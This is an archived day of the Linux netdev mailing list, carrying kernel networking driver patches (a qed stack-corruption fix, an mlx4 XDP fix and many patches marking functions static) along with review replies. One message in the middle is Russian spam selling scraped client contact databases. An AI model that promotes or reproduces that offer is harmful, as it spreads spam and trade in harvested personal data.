date:20160918

Re: [PATCH net-next 0/5] mlx4 misc fixes and improvements

2016-09-18 Thread Tariq Toukan

Hi Dave,

On 16/09/2016 2:21 AM, David Miller wrote:

From: Tariq Toukan 
Date: Mon, 12 Sep 2016 16:20:11 +0300

This patchset contains some bug fixes, a cleanup, and small improvements
from the team to the mlx4 Eth and core drivers.

Series generated against net-next commit:
02154927c115 "net: dsa: bcm_sf2: Get VLAN_PORT_MASK from b53_device"

Please push the following patch to -stable  >= 4.6 as well:
"net/mlx4_core: Fix to clean devlink resources"

Again, coding style fixes and optimizations like branch prediction
hints are not bug fixes and therefore not appropriate for 'net'.

Yes, I know. Please notice that it was submitted to net-next this time.

Regards,
Tariq

[PATCH net] qed: Fix stack corruption on probe

2016-09-18 Thread Yuval Mintz

Commit fe56b9e6a8d95 ("qed: Add module with basic common support")
has introduced a stack corruption during probe, where filling a
local struct with data to be sent to management firmware is incorrectly
filled; The data is written outside of the struct and corrupts
the stack.

Fixes: fe56b9e6a8d95 ("qed: Add module with basic common support")
Signed-off-by: Yuval Mintz 
---
Hi Dave,

In case it isn't obvious at first glance, the corruption is due
to the next line in the for-loop, which isn't changed by the patch.

Please consider applying this to `net'.

Thanks,
Yuval
---
 drivers/net/ethernet/qlogic/qed/qed_mcp.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/qlogic/qed/qed_mcp.c 
b/drivers/net/ethernet/qlogic/qed/qed_mcp.c
index a240f26..69f5b04 100644
--- a/drivers/net/ethernet/qlogic/qed/qed_mcp.c
+++ b/drivers/net/ethernet/qlogic/qed/qed_mcp.c
@@ -1153,8 +1153,8 @@ qed_mcp_send_drv_version(struct qed_hwfn *p_hwfn,
p_drv_version = &union_data.drv_version;
p_drv_version->version = p_ver->version;
 
-   for (i = 0; i < MCP_DRV_VER_STR_SIZE - 1; i += 4) {
-   val = cpu_to_be32(p_ver->name[i]);
+   for (i = 0; i < (MCP_DRV_VER_STR_SIZE - 4) / sizeof(u32); i++) {
+   val = cpu_to_be32(p_ver->name[i * sizeof(u32)]);
*(__be32 *)&p_drv_version->name[i * sizeof(u32)] = val;
}
 
-- 
1.9.3

Клиентские базы тел +79139230330 Skype: prodawez390 Whatsapp: +79139230330 Viber: +79139230330 Telegram: +79139230330 Email: nbiruko...@gmail.com Узнайте об этом подробнее!

2016-09-18 Thread netdev@vger.kernel.org

Соберем для Вас по интернет базу данных контактов потенциальных клиентов для 
массовой продажи Ваших товаров и услуг в городе, стране или в мире. В базе - 
название, телефон, факс, местоположение, mail, имена руководителей или 
сотрудников итд Узнайте об этом подробнее! тел +79139230330 Skype: prodawez390 
Whatsapp: +79139230330 Viber: +79139230330 Telegram: +79139230330 Email: 
nbiruko...@gmail.com Спасибо за быстрый ответ!

[PATCH] phy: mark lan88xx_suspend() static

2016-09-18 Thread Baoyou Xie

We get 1 warning when building kernel with W=1:
drivers/net/phy/microchip.c:58:5: warning: no previous prototype for 
'lan88xx_suspend' [-Wmissing-prototypes]

In fact, this function is only used in the file in which it is
declared and don't need a declaration, but can be made static.
so this patch marks this function with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/phy/microchip.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/phy/microchip.c b/drivers/net/phy/microchip.c
index 15f8206..7c00e50 100644
--- a/drivers/net/phy/microchip.c
+++ b/drivers/net/phy/microchip.c
@@ -55,7 +55,7 @@ static int lan88xx_phy_ack_interrupt(struct phy_device 
*phydev)
return rc < 0 ? rc : 0;
 }
 
-int lan88xx_suspend(struct phy_device *phydev)
+static int lan88xx_suspend(struct phy_device *phydev)
 {
struct lan88xx_priv *priv = phydev->priv;
 
-- 
2.7.4

Re: [net PATCH V3] mlx4: fix XDP_TX is acting like XDP_PASS on TX ring full

2016-09-18 Thread Tariq Toukan



On 17/09/2016 6:48 PM, Jesper Dangaard Brouer wrote:

The XDP_TX action can fail transmitting the frame in case the TX ring
is full or port is down.  In case of TX failure it should drop the
frame, and not as now call 'break' which is the same as XDP_PASS.

Fixes: 9ecc2d86171a ("net/mlx4_en: add xdp forwarding and data write support")
Signed-off-by: Jesper Dangaard Brouer 

---
Is this goto lable inside a switch case too ugly?
I thought about getting "shared code" outside of the switch case, but I 
don't think it will look any better.


Given this label, we can change the goto position by re-ordering the 
cases, swapping between XDP_TX and default so that the XDP_TX is 
immediately followed by XDP_ABORTED and XDP_DROP, and won't need a goto 
operation.
Instead, it will be used in default case, which should not be reached 
anyway. This saves a jump for actual (error) cases.


Something like this:

act = bpf_prog_run_xdp(xdp_prog, &xdp);
switch (act) {
case XDP_PASS:
break;
default:
bpf_warn_invalid_xdp_action(act);
goto xdp_drop;
case XDP_TX:
if (!mlx4_en_xmit_frame(frags, dev,
length, tx_index,
&doorbell_pending))
goto consumed;
case XDP_ABORTED:
case XDP_DROP:
xdp_drop:
if (mlx4_en_rx_recycle(ring, frags))
goto consumed;
goto next;
}


Note, this fix have nothing to do with the page-refcnt bug I reported.

  drivers/net/ethernet/mellanox/mlx4/en_rx.c |3 ++-
  1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/mellanox/mlx4/en_rx.c 
b/drivers/net/ethernet/mellanox/mlx4/en_rx.c
index 2040dad8611d..9eadda431965 100644
--- a/drivers/net/ethernet/mellanox/mlx4/en_rx.c
+++ b/drivers/net/ethernet/mellanox/mlx4/en_rx.c
@@ -906,11 +906,12 @@ int mlx4_en_process_rx_cq(struct net_device *dev, struct 
mlx4_en_cq *cq, int bud
length, tx_index,
&doorbell_pending))
goto consumed;
-   break;
+   goto xdp_drop; /* Drop on xmit failure */
default:
bpf_warn_invalid_xdp_action(act);
case XDP_ABORTED:
case XDP_DROP:
+   xdp_drop:
if (mlx4_en_rx_recycle(ring, frags))
goto consumed;
goto next;


But also this way is fine by me.

Regards,
Tariq

[PATCH] be2net: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 4 warnings when building kernel with W=1:
drivers/net/ethernet/emulex/benet/be_main.c:4368:6: warning: no previous 
prototype for 'be_calculate_pf_pool_rss_tables' [-Wmissing-prototypes]
drivers/net/ethernet/emulex/benet/be_cmds.c:4385:5: warning: no previous 
prototype for 'be_get_nic_pf_num_list' [-Wmissing-prototypes]
drivers/net/ethernet/emulex/benet/be_cmds.c:4537:6: warning: no previous 
prototype for 'be_reset_nic_desc' [-Wmissing-prototypes]
drivers/net/ethernet/emulex/benet/be_cmds.c:4910:5: warning: no previous 
prototype for '__be_cmd_set_logical_link_config' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/emulex/benet/be_cmds.c | 9 +
 drivers/net/ethernet/emulex/benet/be_main.c | 2 +-
 2 files changed, 6 insertions(+), 5 deletions(-)

diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c 
b/drivers/net/ethernet/emulex/benet/be_cmds.c
index 15d02da..9cffe48 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.c
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.c
@@ -4382,7 +4382,7 @@ err:
 }
 
 /* This routine returns a list of all the NIC PF_nums in the adapter */
-u16 be_get_nic_pf_num_list(u8 *buf, u32 desc_count, u16 *nic_pf_nums)
+static u16 be_get_nic_pf_num_list(u8 *buf, u32 desc_count, u16 *nic_pf_nums)
 {
struct be_res_desc_hdr *hdr = (struct be_res_desc_hdr *)buf;
struct be_pcie_res_desc *pcie = NULL;
@@ -4534,7 +4534,7 @@ static int be_cmd_set_profile_config(struct be_adapter 
*adapter, void *desc,
 }
 
 /* Mark all fields invalid */
-void be_reset_nic_desc(struct be_nic_res_desc *nic)
+static void be_reset_nic_desc(struct be_nic_res_desc *nic)
 {
memset(nic, 0, sizeof(*nic));
nic->unicast_mac_count = 0x;
@@ -4907,8 +4907,9 @@ err:
return status;
 }
 
-int __be_cmd_set_logical_link_config(struct be_adapter *adapter,
-int link_state, int version, u8 domain)
+static int
+__be_cmd_set_logical_link_config(struct be_adapter *adapter,
+int link_state, int version, u8 domain)
 {
struct be_mcc_wrb *wrb;
struct be_cmd_req_set_ll_link *req;
diff --git a/drivers/net/ethernet/emulex/benet/be_main.c 
b/drivers/net/ethernet/emulex/benet/be_main.c
index 34f63ef..9a94840 100644
--- a/drivers/net/ethernet/emulex/benet/be_main.c
+++ b/drivers/net/ethernet/emulex/benet/be_main.c
@@ -4365,7 +4365,7 @@ static void be_setup_init(struct be_adapter *adapter)
  * for distribution between the VFs. This self-imposed limit will determine the
  * no: of VFs for which RSS can be enabled.
  */
-void be_calculate_pf_pool_rss_tables(struct be_adapter *adapter)
+static void be_calculate_pf_pool_rss_tables(struct be_adapter *adapter)
 {
struct be_port_resources port_res = {0};
u8 rss_tables_on_port;
-- 
2.7.4

[PATCH] mlxsw: spectrum: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 3 warnings when building kernel with W=1:
drivers/net/ethernet/mellanox/mlxsw/spectrum.c:251:29: warning: no previous 
prototype for 'mlxsw_sp_span_entry_find' [-Wmissing-prototypes]
drivers/net/ethernet/mellanox/mlxsw/spectrum.c:265:29: warning: no previous 
prototype for 'mlxsw_sp_span_entry_get' [-Wmissing-prototypes]
drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:1749:6: warning: no 
previous prototype for 'mlxsw_sp_fib_entry_put' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/mellanox/mlxsw/spectrum.c| 6 --
 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c | 4 ++--
 2 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c 
b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
index 1162e04..e680193 100644
--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
@@ -248,7 +248,8 @@ static void mlxsw_sp_span_entry_destroy(struct mlxsw_sp 
*mlxsw_sp,
span_entry->used = false;
 }
 
-struct mlxsw_sp_span_entry *mlxsw_sp_span_entry_find(struct mlxsw_sp_port 
*port)
+static struct
+mlxsw_sp_span_entry *mlxsw_sp_span_entry_find(struct mlxsw_sp_port *port)
 {
struct mlxsw_sp *mlxsw_sp = port->mlxsw_sp;
int i;
@@ -262,7 +263,8 @@ struct mlxsw_sp_span_entry *mlxsw_sp_span_entry_find(struct 
mlxsw_sp_port *port)
return NULL;
 }
 
-struct mlxsw_sp_span_entry *mlxsw_sp_span_entry_get(struct mlxsw_sp_port *port)
+static struct
+mlxsw_sp_span_entry *mlxsw_sp_span_entry_get(struct mlxsw_sp_port *port)
 {
struct mlxsw_sp_span_entry *span_entry;
 
diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c 
b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
index 352259b..82cdeba 100644
--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
@@ -1746,8 +1746,8 @@ mlxsw_sp_fib_entry_find(struct mlxsw_sp *mlxsw_sp,
 fib4->fi->fib_dev);
 }
 
-void mlxsw_sp_fib_entry_put(struct mlxsw_sp *mlxsw_sp,
-   struct mlxsw_sp_fib_entry *fib_entry)
+static void mlxsw_sp_fib_entry_put(struct mlxsw_sp *mlxsw_sp,
+  struct mlxsw_sp_fib_entry *fib_entry)
 {
struct mlxsw_sp_vr *vr = fib_entry->vr;
 
-- 
2.7.4

[PATCH] net/mlx5: clean function declarations in eswitch.c up

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:463:5: warning: no 
previous prototype for 'esw_offloads_init' [-Wmissing-prototypes]
drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:521:6: warning: no 
previous prototype for 'esw_offloads_cleanup' [-Wmissing-prototypes]

In fact, both functions are declared in
drivers/net/ethernet/mellanox/mlx5/core/eswitch.c,but should be
declared in a header file, thus can be recognized in other file.

So this patch moves the declarations into
drivers/net/ethernet/mellanox/mlx5/core/eswitch.h

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/mellanox/mlx5/core/eswitch.c | 3 ---
 drivers/net/ethernet/mellanox/mlx5/core/eswitch.h | 3 +++
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c 
b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
index 1014305..b453cb6 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
@@ -81,9 +81,6 @@ enum {
MC_ADDR_CHANGE | \
PROMISC_CHANGE)
 
-int esw_offloads_init(struct mlx5_eswitch *esw, int nvports);
-void esw_offloads_cleanup(struct mlx5_eswitch *esw, int nvports);
-
 static int arm_vport_context_events_cmd(struct mlx5_core_dev *dev, u16 vport,
u32 events_mask)
 {
diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h 
b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
index a961409..3bc5336 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
@@ -201,6 +201,9 @@ struct mlx5_eswitch {
int mode;
 };
 
+void esw_offloads_cleanup(struct mlx5_eswitch *esw, int nvports);
+int esw_offloads_init(struct mlx5_eswitch *esw, int nvports);
+
 /* E-Switch API */
 int mlx5_eswitch_init(struct mlx5_core_dev *dev);
 void mlx5_eswitch_cleanup(struct mlx5_eswitch *esw);
-- 
2.7.4

[PATCH] ixgbe: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c:2128:5: warning: no previous 
prototype for 'ixgbe_led_on_t_x550em' [-Wmissing-prototypes]
drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c:2150:5: warning: no previous 
prototype for 'ixgbe_led_off_t_x550em' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c 
b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
index e092a89..dec8b11 100644
--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
@@ -2125,7 +2125,7 @@ static s32 ixgbe_reset_phy_t_X550em(struct ixgbe_hw *hw)
  *  @hw: pointer to hardware structure
  *  @led_idx: led number to turn on
  **/
-s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+static s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
 {
u16 phy_data;
 
@@ -2147,7 +2147,7 @@ s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 
led_idx)
  *  @hw: pointer to hardware structure
  *  @led_idx: led number to turn off
  **/
-s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+static s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
 {
u16 phy_data;
 
-- 
2.7.4

[PATCH] igb: mark igb_rxnfc_write_vlan_prio_filter() static

2016-09-18 Thread Baoyou Xie

We get 1 warning when building kernel with W=1:
drivers/net/ethernet/intel/igb/igb_ethtool.c:2707:5: warning: no previous 
prototype for 'igb_rxnfc_write_vlan_prio_filter' [-Wmissing-prototypes]

In fact, this function is only used in the file in which it is
declared and don't need a declaration, but can be made static.
so this patch marks this function with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/intel/igb/igb_ethtool.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/intel/igb/igb_ethtool.c 
b/drivers/net/ethernet/intel/igb/igb_ethtool.c
index 0c33eca..737b664 100644
--- a/drivers/net/ethernet/intel/igb/igb_ethtool.c
+++ b/drivers/net/ethernet/intel/igb/igb_ethtool.c
@@ -2704,8 +2704,8 @@ static int igb_rxnfc_write_etype_filter(struct 
igb_adapter *adapter,
return 0;
 }
 
-int igb_rxnfc_write_vlan_prio_filter(struct igb_adapter *adapter,
-struct igb_nfc_filter *input)
+static int igb_rxnfc_write_vlan_prio_filter(struct igb_adapter *adapter,
+   struct igb_nfc_filter *input)
 {
struct e1000_hw *hw = &adapter->hw;
u8 vlan_priority;
-- 
2.7.4

[PATCH] net: hns: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get a few warnings when building kernel with W=1:
drivers/net/ethernet/hisilicon/hisi_femac.c:943:5: warning: no previous 
prototype for 'hisi_femac_drv_suspend' [-Wmissing-prototypes]
drivers/net/ethernet/hisilicon/hisi_femac.c:960:5: warning: no previous 
prototype for 'hisi_femac_drv_resume' [-Wmissing-prototypes]
drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c:76:21: warning: no previous 
prototype for 'hns_ae_get_handle' [-Wmissing-prototypes]


In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/hisilicon/hisi_femac.c|  6 ++---
 drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c  | 30 +++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_gmac.c |  2 +-
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c  |  8 +++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_main.c |  7 ++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c |  6 ++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_ppe.c  |  7 ++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_rcb.c  |  4 +--
 .../net/ethernet/hisilicon/hns/hns_dsaf_xgmac.c|  2 +-
 drivers/net/ethernet/hisilicon/hns/hns_enet.c  | 12 -
 drivers/net/ethernet/hisilicon/hns/hns_ethtool.c   | 24 +
 11 files changed, 57 insertions(+), 51 deletions(-)

diff --git a/drivers/net/ethernet/hisilicon/hisi_femac.c 
b/drivers/net/ethernet/hisilicon/hisi_femac.c
index ca68e22..ced1859 100644
--- a/drivers/net/ethernet/hisilicon/hisi_femac.c
+++ b/drivers/net/ethernet/hisilicon/hisi_femac.c
@@ -940,8 +940,8 @@ static int hisi_femac_drv_remove(struct platform_device 
*pdev)
 }
 
 #ifdef CONFIG_PM
-int hisi_femac_drv_suspend(struct platform_device *pdev,
-  pm_message_t state)
+static int hisi_femac_drv_suspend(struct platform_device *pdev,
+ pm_message_t state)
 {
struct net_device *ndev = platform_get_drvdata(pdev);
struct hisi_femac_priv *priv = netdev_priv(ndev);
@@ -957,7 +957,7 @@ int hisi_femac_drv_suspend(struct platform_device *pdev,
return 0;
 }
 
-int hisi_femac_drv_resume(struct platform_device *pdev)
+static int hisi_femac_drv_resume(struct platform_device *pdev)
 {
struct net_device *ndev = platform_get_drvdata(pdev);
struct hisi_femac_priv *priv = netdev_priv(ndev);
diff --git a/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c 
b/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c
index e28d960..a1150e9 100644
--- a/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c
+++ b/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c
@@ -73,8 +73,8 @@ static struct ring_pair_cb *hns_ae_get_ring_pair(struct 
hnae_queue *q)
return container_of(q, struct ring_pair_cb, q);
 }
 
-struct hnae_handle *hns_ae_get_handle(struct hnae_ae_dev *dev,
- u32 port_id)
+static struct hnae_handle *hns_ae_get_handle(struct hnae_ae_dev *dev,
+u32 port_id)
 {
int vfnum_per_port;
int qnum_per_vf;
@@ -271,7 +271,7 @@ static int hns_ae_start(struct hnae_handle *handle)
return 0;
 }
 
-void hns_ae_stop(struct hnae_handle *handle)
+static void hns_ae_stop(struct hnae_handle *handle)
 {
struct hns_mac_cb *mac_cb = hns_get_mac_cb(handle);
 
@@ -299,7 +299,7 @@ static void hns_ae_reset(struct hnae_handle *handle)
}
 }
 
-void hns_ae_toggle_ring_irq(struct hnae_ring *ring, u32 mask)
+static void hns_ae_toggle_ring_irq(struct hnae_ring *ring, u32 mask)
 {
u32 flag;
 
@@ -487,8 +487,8 @@ static void hns_ae_get_coalesce_range(struct hnae_handle 
*handle,
*rx_usecs_high  = HNS_RCB_MAX_COALESCED_USECS;
 }
 
-void hns_ae_update_stats(struct hnae_handle *handle,
-struct net_device_stats *net_stats)
+static void hns_ae_update_stats(struct hnae_handle *handle,
+   struct net_device_stats *net_stats)
 {
int port;
int idx;
@@ -570,7 +570,7 @@ void hns_ae_update_stats(struct hnae_handle *handle,
net_stats->multicast = mac_cb->hw_stats.rx_mc_pkts;
 }
 
-void hns_ae_get_stats(struct hnae_handle *handle, u64 *data)
+static void hns_ae_get_stats(struct hnae_handle *handle, u64 *data)
 {
int idx;
struct hns_mac_cb *mac_cb;
@@ -602,8 +602,8 @@ void hns_ae_get_stats(struct hnae_handle *handle, u64 *data)
hns_dsaf_get_stats(vf_cb->dsaf_dev, p, vf_cb->port_index);
 }
 
-void hns_ae_get_strings(struct hnae_handle *handle,
-   u32 stringset, u8 *data)
+static void hns_ae_get_strings(struct hnae_handle *handle,
+  u32 stringset, u8 *data)
 {
int port;
int idx;
@@ -635,7 +635,7 @@ void hns_ae_get_strings(struct hnae_handle *handle,
hns_dsaf_get_strings(stringset, p, port, dsaf

Re: [PATCH] mlxsw: spectrum: mark symbols static where possible

2016-09-18 Thread Ido Schimmel

Hi,

On Sun, Sep 18, 2016 at 04:39:47PM +0800, Baoyou Xie wrote:
> We get 3 warnings when building kernel with W=1:
> drivers/net/ethernet/mellanox/mlxsw/spectrum.c:251:29: warning: no previous 
> prototype for 'mlxsw_sp_span_entry_find' [-Wmissing-prototypes]
> drivers/net/ethernet/mellanox/mlxsw/spectrum.c:265:29: warning: no previous 
> prototype for 'mlxsw_sp_span_entry_get' [-Wmissing-prototypes]
> drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:1749:6: warning: no 
> previous prototype for 'mlxsw_sp_fib_entry_put' [-Wmissing-prototypes]
> 
> In fact, these functions are only used in the file in which they are
> declared and don't need a declaration, but can be made static.
> so this patch marks these functions with 'static'.
> 
> Signed-off-by: Baoyou Xie 

Thanks for the patch! We already have a patch that fixes sparse warnings
(including these) queued up. See:
https://github.com/jpirko/linux_mlxsw/commit/4800ed89f5da55a42a173d5cf9225d4fbb8a96bd

But since we already have one patch under review we've yet to submit it.
https://patchwork.ozlabs.org/patch/670846/

Do you mind dropping this and instead let our patch (with the rest of
the fixes) go through?

Thanks, Ido.

[PATCH] net: hns: add function declarations in hns_dsaf_mac.h

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:246:6: warning: no previous 
prototype for 'hns_dsaf_srst_chns' [-Wmissing-prototypes]
drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:276:6: warning: no previous 
prototype for 'hns_dsaf_roce_srst' [-Wmissing-prototypes]

In fact, these two functions are not declared in any file, but should
be declared in a header file, thus can be recognized in other file.

So this patch adds the declarations into
drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h 
b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
index 4cbdf14..31f6505 100644
--- a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
+++ b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
@@ -462,4 +462,6 @@ int hns_cpld_led_set_id(struct hns_mac_cb *mac_cb,
enum hnae_led_state status);
 void hns_mac_set_promisc(struct hns_mac_cb *mac_cb, u8 en);
 
+void hns_dsaf_srst_chns(struct dsaf_device *dsaf_dev, u32 msk, bool dereset);
+void hns_dsaf_roce_srst(struct dsaf_device *dsaf_dev, bool dereset);
 #endif /* _HNS_DSAF_MAC_H */
-- 
2.7.4

[PATCH] cxgb4: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get a few warnings when building kernel with W=1:
drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c:178:5: warning: no previous 
prototype for 'setup_sge_queues_uld' [-Wmissing-prototypes]
drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c:205:6: warning: no previous 
prototype for 'free_sge_queues_uld' [-Wmissing-prototypes]


In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c | 23 +--
 1 file changed, 13 insertions(+), 10 deletions(-)

diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c 
b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c
index 5d402ba..fb40ddb 100644
--- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c
+++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c
@@ -175,7 +175,8 @@ freeout:
return err;
 }
 
-int setup_sge_queues_uld(struct adapter *adap, unsigned int uld_type, bool lro)
+static int
+setup_sge_queues_uld(struct adapter *adap, unsigned int uld_type, bool lro)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
 
@@ -202,7 +203,7 @@ static void t4_free_uld_rxqs(struct adapter *adap, int n,
}
 }
 
-void free_sge_queues_uld(struct adapter *adap, unsigned int uld_type)
+static void free_sge_queues_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
 
@@ -214,8 +215,8 @@ void free_sge_queues_uld(struct adapter *adap, unsigned int 
uld_type)
kfree(rxq_info->msix_tbl);
 }
 
-int cfg_queues_uld(struct adapter *adap, unsigned int uld_type,
-  const struct cxgb4_pci_uld_info *uld_info)
+static int cfg_queues_uld(struct adapter *adap, unsigned int uld_type,
+ const struct cxgb4_pci_uld_info *uld_info)
 {
struct sge *s = &adap->sge;
struct sge_uld_rxq_info *rxq_info;
@@ -273,7 +274,7 @@ int cfg_queues_uld(struct adapter *adap, unsigned int 
uld_type,
return 0;
 }
 
-void free_queues_uld(struct adapter *adap, unsigned int uld_type)
+static void free_queues_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
 
@@ -282,7 +283,8 @@ void free_queues_uld(struct adapter *adap, unsigned int 
uld_type)
kfree(rxq_info);
 }
 
-int request_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
+static int
+request_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx, bmap_idx, err = 0;
@@ -307,7 +309,8 @@ unwind:
return err;
 }
 
-void free_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
+static void
+free_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx;
@@ -321,7 +324,7 @@ void free_msix_queue_irqs_uld(struct adapter *adap, 
unsigned int uld_type)
}
 }
 
-void name_msix_vecs_uld(struct adapter *adap, unsigned int uld_type)
+static void name_msix_vecs_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int n = sizeof(adap->msix_info_ulds[0].desc);
@@ -361,7 +364,7 @@ static void quiesce_rx(struct adapter *adap, struct 
sge_rspq *q)
}
 }
 
-void enable_rx_uld(struct adapter *adap, unsigned int uld_type)
+static void enable_rx_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx;
@@ -370,7 +373,7 @@ void enable_rx_uld(struct adapter *adap, unsigned int 
uld_type)
enable_rx(adap, &rxq_info->uldrxq[idx].rspq);
 }
 
-void quiesce_rx_uld(struct adapter *adap, unsigned int uld_type)
+static void quiesce_rx_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx;
-- 
2.7.4

[PATCH] net: mvneta: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/marvell/mvneta.c:639:27: warning: no previous prototype 
for 'mvneta_get_stats64' [-Wmissing-prototypes]
drivers/net/ethernet/marvell/mvneta.c:3529:5: warning: no previous prototype 
for 'mvneta_ethtool_set_link_ksettings' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, but can be made static.
so this patch marks these functions with 'static'.

Signed-off-by: Baoyou Xie 
---
